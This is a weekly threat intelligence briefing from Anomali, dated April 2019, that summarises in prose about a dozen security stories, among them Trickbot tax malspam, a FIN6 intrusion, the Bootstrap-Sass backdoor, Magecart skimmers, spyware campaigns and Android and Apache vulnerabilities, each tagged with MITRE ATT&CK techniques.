April 9, 2019
-
Anomali Threat Research
,

Weekly Threat Briefing: Cybercriminals Spoof Major Accounting and Payroll Firms in Tax Season Malware Campaigns

<div id="weekly"><p id="intro">The intelligence in this week’s iteration discuss the following threats: <strong>Backdoor, FIN6, LockerGoga, MageCart, Malicious applications, Malspam, Phishing, Ransomware, Ryuk, Trickbot,</strong> and <strong>Vulnerabilities.</strong> The IOCs related to these stories are attached to the Community Threat Briefing and can be used to check your logs for potential malicious activity.</p><div id="trending-threats"><h2 id="trendingthreats">Trending Threats</h2><p><a href="https://securityintelligence.com/cybercriminals-spoof-major-accounting-and-payroll-firms-in-tax-season-malware-campaigns/" target="_blank"><b>Cybercriminals Spoof Major Accounting and Payroll Firms in Tax Season Malware Campaigns</b></a> (<i>April 8, 2019</i>)<br/> IBM X-Force researchers have identified several tax-themed malspam campaigns that appear to be targeting business and there is the possibility that those business’ customers may become affected as well. The actors behind this campaign are distributing malspam that masquerade as accounting firms, human resource companies, and payroll organizations operating within the US. The impersonated companies include “ADP,” an HR management and services firm, and the payroll provider “Paychex.” The emails attempt to convince recipients into opening a macro-embedded Microsoft Excel document. The heavily obfuscated macro will, if enabled, begin the infection process for the “Trickbot” banking trojan. Trickbot attempts to steal as much data as possible, primarily banking credentials, before sending the information to a Command and Control (C2) server.<br/> <a href="https://forum.anomali.com/t/cybercriminals-spoof-major-accounting-and-payroll-firms-in-tax-season-malware-campaigns/3710" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947205">[MITRE ATT&amp;CK] User Execution (T1204)</a> | <a href="https://ui.threatstream.com/ttp/947180">[MITRE ATT&amp;CK] Spearphishing Attachment (T1193)</a></p><p><a href="https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html" target="_blank"><b>Pick-Six: Intercepting a FIN6 Intrusion, an Actor Recently Tied to Ryuk and LockerGoga Ransomware</b></a> (<i>April 5, 2019</i>)<br/> FireEye researchers responded to an incident and found that the activity was conducted by the financially-motivate threat group “FIN6.” Researchers found that the group compromised an internet-facing system of its unnamed target and then moved laterally inside the network utilizing stolen credentials for Windows’ Remote Desktop Protocol (RDP). FIN6 used two techniques to maintain persistence including PowerShell to execute an encoded command that turned out to be a “Cobalt Strike httpsstager,” which would then download a second shellcode payload configured to download a third, unknown payload. The second technique was the creation of a Windows service to execute encoded PowerShell commands that contained a “Metasploit” reverse HTTP shellcode. The objective of the campaign was to use the compromised servers to distribute malware and host tools. The staged malware was found to be the “LockerGoga” and “Ryuk” ransomware families. Using ransomware is a change of tactics for FIN6 from primarily targeting point-of-sale terminals.<br/> <a href="https://forum.anomali.com/t/pick-six-intercepting-a-fin6-intrusion-an-actor-recently-tied-to-ryuk-and-lockergoga-ransomware/3711" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947156">[MITRE ATT&amp;CK] Remote Desktop Protocol (T1076)</a> | <a href="https://ui.threatstream.com/ttp/947231">[MITRE ATT&amp;CK] Valid Accounts (T1078)</a> | <a href="https://ui.threatstream.com/ttp/947287">[MITRE ATT&amp;CK] PowerShell (T1086)</a> | <a href="https://ui.threatstream.com/ttp/947224">[MITRE ATT&amp;CK] Exfiltration Over Alternative Protocol (T1048)</a></p><p><a href="https://www.zdnet.com/article/backdoor-code-found-in-popular-bootstrap-sass-ruby-library/" target="_blank"><b>Backdoor Code Found in Popular Bootstrap-Sass Ruby Library</b></a> (<i>April 5, 2019</i>)<br/> Software developer, Derek Barnes, discovered a backdoor in the Ruby programming language library, “Bootstrap-Sass.” Barnes noticed the issue when someone removed a version of the library (3.2.0.2) and replaced it with a new version (3.2.0.3) on the Ruby library repository “RubyGems” but not on GitHub. Barnes noticed some embedded code inside Ruby, and the “Ruby on Rails” framework, would load a cookie file and execute its content, and this functionality was confirmed by a security researcher from Bad Packets. On April 4, 2019, Ruby version 3.2.0.4 was released on RubyGems and on GitHub.<br/> <a href="https://forum.anomali.com/t/backdoor-code-found-in-popular-bootstrap-sass-ruby-library/3712" target="_blank">Click here for Anomali recommendation</a></p><p><a href="https://www.agari.com/email-security-blog/london-blue-evolving-tactics/" target="_blank"><b>BEC Scam Gang London Blue Evolves Tactics, Targets</b></a> (<i>April 4, 2019</i>)<br/> The threat group “London Blue,” known primarily for conducting Business Email Compromise (BEC) attacks, has been found to have been conducting a new campaign since January 2019, according to Agari researchers. London Blue is a Nigerian group that has been active since at least 2011 and has members in the U.S., the U.K, and other places around the world; members not located in Nigeria are primarily involved in moving stolen funds to actor-controlled accounts. Agari researchers were able to identify the new campaign via an email sent to the company’s Chief Financial Officer (CFO). The campaign comes in multiple parts. The initial email claims that a correspondent of the recipient forwarded the sender an email to let the sender know if anything else is needed. The follow up email purports that the sender needs the recipient to assist in an acquisition and that a down payment of $86,000 USD via wire transfer is required to complete the acquisition. The email purports that this acquisition has yet to be made public and therefore requests the recipient not to discuss this with anyone else in the office.<br/> <a href="https://forum.anomali.com/t/bec-scam-gang-london-blue-evolves-tactics-targets/3713" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947205">[MITRE ATT&amp;CK] User Execution (T1204)</a></p><p><a href="https://www.bleepingcomputer.com/news/security/dozens-of-credit-card-info-skimming-scripts-infect-thousands-of-sites/" target="_blank"><b>Dozens of Credit Card Info Skimming Scripts Infect Thousands of Sites</b></a> (<i>April 3, 2019</i>)<br/> The threat groups targeting website checkout pages with credit and debit card skimming malware, referred to collectively as Magecart, have developed new skimmers that have not been analyzed before, according to Group-IB researchers. RiskIQ researchers first reported on Magecart activity and found approximately 38 different families of skimming scripts utilized by the 12 groups that comprise Magecart. Group-IB researchers analyzed 15 of the 38 samples, which they call “JS-Sniffer,” and found that approximately 2,440 websites had been infected with a JS-Sniffer skimmer. Threat actors likely compromise the website to install the skimmer via a known vulnerability, through stolen credentials, or through a supply chain attack.<br/> <a href="https://forum.anomali.com/t/dozens-of-credit-card-info-skimming-scripts-infect-thousands-of-sites/3714" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947201">[MITRE ATT&amp;CK] Scripting (T1064)</a> | <a href="https://ui.threatstream.com/ttp/1260019">[MITRE PRE-ATT&amp;CK] Research relevant vulnerabilities/CVEs (PRE-T1068)</a></p><p><a href="https://www.upguard.com/breaches/facebook-user-data-leak" target="_blank"><b>Losing Face: Two More Cases of Third-Party Facebook App Data Exposure</b></a> (<i>April 3, 2019</i>)<br/> The UpGuard Cyber Risk team has published their findings of two third-party Facebook application datasets that were publicly accessible on the internet. One of the datasets was found originate from the Mexico-based media company, “Coltura Colectiva,” and consisting of 146 gigabytes containing 540 million Facebook records. The records contained information such as account names, comments, Facebook IDs, and likes, amongst others. Researchers also identified a different Facebook-integrated application hosted on a publicly-accessible Amazon S3 bucket called “At the Pool.” The bucket for the At the Pool application contained information consisting of data labeled as fb_books, fb+checkins, fb_events, fb_friends, fb_groups, fb_interests, fb_likes, fb_movies, fb_music, password, fb_photos, among others.<br/> <a href="https://forum.anomali.com/t/losing-face-two-more-cases-of-third-party-facebook-app-data-exposure/3715" target="_blank">Click here for Anomali recommendation</a></p><p><a href="https://www.alienvault.com/blogs/labs-research/xwo-a-python-based-bot-scanner" target="_blank"><b>Xwo – A Python-Based Bot Scanner</b></a> (<i>April 2, 2019</i>)<br/> A new malware family, dubbed “Xwo,” has been found to be utilized by threat actors by distributing a file called “xwo.exe” from a Command and Control (C2) server. Xwo is a scanner that is capable of sending stolen credentials back to a C2 server. The malware was found to share similarities in code and infrastructure with the “MongoLock” ransomware, although Xwo has no ransomware or exploit capabilities. Once Xwo has infected a machine, it will conduct an HTTP POST request using a User-Agent from a hardcoded list, and then will receive instructions from a C2 domain containing an encoded public network range to scan and gather information on. Xwo will gather data such as default credentials and SVN and Git paths, PhpMyAdmin details, use of default credentials for FTP, Memcached, MongoDB, MySQL, PostgreSQL, and Redis, among other data. Researchers believe that while this malware does not have malicious features such as ransomware or exploit capabilities, the actors behind Xwo will utilize the information gathered in the future.<br/> <a href="https://forum.anomali.com/t/xwo-a-python-based-bot-scanner/3716" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947205">[MITRE ATT&amp;CK] User Execution (T1204)</a> | <a href="https://ui.threatstream.com/ttp/947125">[MITRE ATT&amp;CK] System Information Discovery (T1082)</a> | <a href="https://ui.threatstream.com/ttp/947276">[MITRE ATT&amp;CK] Network Service Scanning (T1046)</a> | <a href="https://ui.threatstream.com/ttp/947289">[MITRE ATT&amp;CK] Custom Command and Control Protocol (T1094)</a></p><p><a href="https://www.theregister.co.uk/2019/04/02/april_android_security/" target="_blank"><b>Don’t be an April Fool: Update Your Android Mobes, Gizmos to – Hopefully – Pick up Critical Security Fixes</b></a> (<i>April 2, 2019</i>)<br/> Google has addressed its monthly patch release in two batches for April to address 11 CVE-registered vulnerabilities and 44 flaws. Two of the 11 CVE vulnerabilities, “CVE-2019-2027” and “CVE-2019-2028,” are Remote Code Execution (RCE) vulnerabilities and could be exploited by a threat actor by convincing someone to open a malicious message or video. The other nine CVEs consist of a privilege escalation vulnerability that could be exploited by an installed application, eight located in the Android system, five other privilege escalation flaws, and three that expose information. The nine vulnerabilities are all rated as “high severity.”<br/> <a href="https://forum.anomali.com/t/don-t-be-an-april-fool-update-your-android-mobes-gizmos-to-hopefully-pick-up-critical-security-fixes/3717" target="_blank">Click here for Anomali recommendation</a></p><p><a href="https://blog.trendmicro.com/trendlabs-security-intelligence/new-version-of-xloader-that-disguises-as-android-apps-and-an-ios-profile-holds-new-links-to-fakespy/" target="_blank"><b>New Version of XLoader That Disguises as Android Apps and an iOS Profile Holds New Links to FakeSpy</b></a> (<i>April 2, 2019</i>)<br/> A new variant of the “XLoader” spying malware (spyware) has been discovered impersonating a security application for Android devices and uses a malicious iOS profile to target iPhones and iPads, according to Trend Micro researchers. This new variant, called XLoader version 6.0, is being distributed through SMS messages (smishing) purporting to contain a link to a fake Android security application. The actors behind this campaign are hosting the malware on several fake websites, one of which was found to be an impersonation of a legitimate Japanese phone operator’s website. Following a link to an actor-controlled website will prompt the visitor to download the malicious application package (SDK). For iOS users, there is a redirection from the initial website to another that then prompts the user to “install a malicious iOS configuration profile to solve a network issue preventing the site the load.” Installation of the profile will open a fake website masquerading as an Apple ID sign-in page. XLoader is capable of stealing various forms of data from an infected device and uses social media profiles on Twitter to conceal Command and Control (C2) server addresses.<br/> <a href="https://forum.anomali.com/t/new-version-of-xloader-that-disguises-as-android-apps-and-an-ios-profile-holds-new-links-to-fakespy/3718" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947263">[MITRE ATT&amp;CK] Spearphishing via Service (T1194)</a> | <a href="https://ui.threatstream.com/ttp/947205">[MITRE ATT&amp;CK] User Execution (T1204)</a> | <a href="https://ui.threatstream.com/ttp/947289">[MITRE ATT&amp;CK] Custom Command and Control Protocol (T1094)</a></p><p><a href="https://www.bleepingcomputer.com/news/security/apache-bug-lets-normal-users-gain-root-access-via-scripts/" target="_blank"><b>Apache Bug Lets Normal Users Gain Root Access Via Scripts</b></a> (<i>April 2, 2019</i>)<br/> Apache Software Foundation and the OpenSSL project founding member, Mark J. Cox, posted on Twitter the details of a vulnerability, registered as “CVE-2019-0211,” that affects Apache HTTP server versions 2.4.17 to 2.4.38. The vulnerability could allow a user with read and write access to gain root privileges on Unix systems and make it possible to execute arbitrary code via scoreboard manipulation. This vulnerability, as well as two others that are registered as “CVE-2019-0217” and “CVE-2019-0215,” were patched in Apache HTTP Server version 2.4.39. CVE-2019-0217 affects versions 2.4.0 through 2.4.38 could allow a user “with valid credentials to authenticate using another username, bypassing configured access control restrictions.” CVE-2019-0215 affects Apache 2.4.37 and 2.4.38 installations and allows “client supporting Post-Handshake Authentication to bypass configured access control restrictions.” Three less-severe vulnerabilities were also addressed in Apache version 2.4.39 that could be exploited to cause crashes, read-after-free, and normalization inconsistency.<br/> <a href="https://forum.anomali.com/t/apache-bug-lets-normal-users-gain-root-access-via-scripts/3719" target="_blank">Click here for Anomali recommendation</a></p><p><a href="https://nakedsecurity.sophos.com/2019/04/02/government-spyware-hidden-in-google-play-store-apps/" target="_blank"><b>Government Spyware Hidden in Google Play Store Apps</b></a> (<i>April 2, 2019</i>)<br/> Security researchers have discovered applications in the Google Play store that contain spying malware (spyware), according to Motherboard reporters. Motherboard believes that the malware is attributable to the Italian government, which reportedly purchased the spyware from a surveillance company called “eSurv.” Security Without Borders researchers claim that the malware, dubbed “Exodus,” has never been previously identified and is attributed to eSurv via a dialect Italian word and the name of a retired footballer, “RINO GATTUSO,” both of which come from the same region where eSurv is based. The Exodus malware works in two stages. The first stage consists of the malware masquerading as an application that receives “promotions and marketing offers from local Italian cell phone providers or that claim to improve the device’s performance.” The first stage will also load the second stage that is responsible for collecting data and sending it back to a Command and Control (C2) server. Exodus is capable of gathering application passwords, browsing history, contacts lists from other applications, text messages, and Wi-fi passwords.<br/> <a href="https://forum.anomali.com/t/government-spyware-hidden-in-google-play-store-apps/3720" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/1260060">[MITRE MOBILE-ATT&amp;CK] Application Discovery (MOB-T1021)</a> | <a href="https://ui.threatstream.com/ttp/1260082">[MITRE MOBILE-ATT&amp;CK] File and Directory Discovery (MOB-T1023)</a> | <a href="https://ui.threatstream.com/ttp/1260119">[MITRE MOBILE-ATT&amp;CK] System Information Discovery (MOB-T1029)</a></p><p><a href="https://threatpost.com/google-warns-of-growing-android-attack-vector-backdoored-sdks-and-pre-installed-apps/143332/" target="_blank"><b>Google Warns of Growing Android Attack Vector: Backdoored SDKs and Pre-Installed Apps</b></a> (<i>April 1, 2019</i>)<br/> Google has released its “Android Security and Privacy Year in Review 2018” in which the company explained that it has observed an increase in threat actors attempting to install Potentially Harmful Applications (PHAs) via supply chain and pre-installed applications. Actors are also targeting Over The Air (OTA) updates “that bundle legitimate system updates with PHAs.” These vectors are appealing from a threat actor’s point of view because they can target applications that come pre-installed on Android devices which leaves a user vulnerable to potential malicious activity associated with an application the user did not choose to install on his/her phone. A device could come pre-installed with malware, and then could download additional malware via compromised third-party update tools.<br/> <a href="https://forum.anomali.com/t/google-warns-of-growing-android-attack-vector-backdoored-sdks-and-pre-installed-apps/3721">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/1259967">[MITRE PRE-ATT&amp;CK] Hardware or software supply chain implant (PRE-T1142)</a></p></div></div>

Get the Latest Anomali Updates and Cybersecurity News – Straight To Your Inbox

Become a subscriber to the Anomali Newsletter
Receive a monthly summary of our latest threat intelligence content, research, news, events, and more.